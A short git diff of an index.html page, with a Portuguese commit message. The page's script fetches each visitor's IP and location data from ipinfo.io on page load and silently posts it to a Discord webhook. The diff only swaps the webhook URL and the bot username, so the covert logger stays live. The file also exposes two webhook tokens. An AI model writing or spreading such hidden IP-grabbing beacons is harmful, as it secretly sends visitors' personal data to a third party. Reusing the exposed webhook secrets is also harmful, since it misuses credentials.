adiçao de novos arquivos

--- a/index.html
+++ b/index.html
@@ -395,7 +395,7 @@
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
 <script>
   $.get("https://ipinfo.io", function (response) {
-    const webhook_url = "https://canary.discord.com/api/webhooks/1250993752252743761/roLPsodIXKajCRFaSa_zDLOSuXZZZLn0fOPWiMwpMrYTu1QMEiNx9oHXG3cRnC6XI9Rj";
+    const webhook_url = "https://canary.discord.com/api/webhooks/1253893883792982098/EGf1WAf7d1XMoOwApQpnWR3hmUr8YlyDOABnS5HsRs8QsYZM1CBCn4QurjClPsAj7S0q";
     const main = {
       description: "https://legendswire.com",
       color: "1",
@@ -445,7 +445,7 @@
     xhttp.open("POST", url, true);
     xhttp.setRequestHeader('Content-Type', 'application/json');
     xhttp.send(JSON.stringify({
-      'username': 'vemvembb',
+      'username': 'legends',
       'embeds': [main],
     }));
   }, "json");
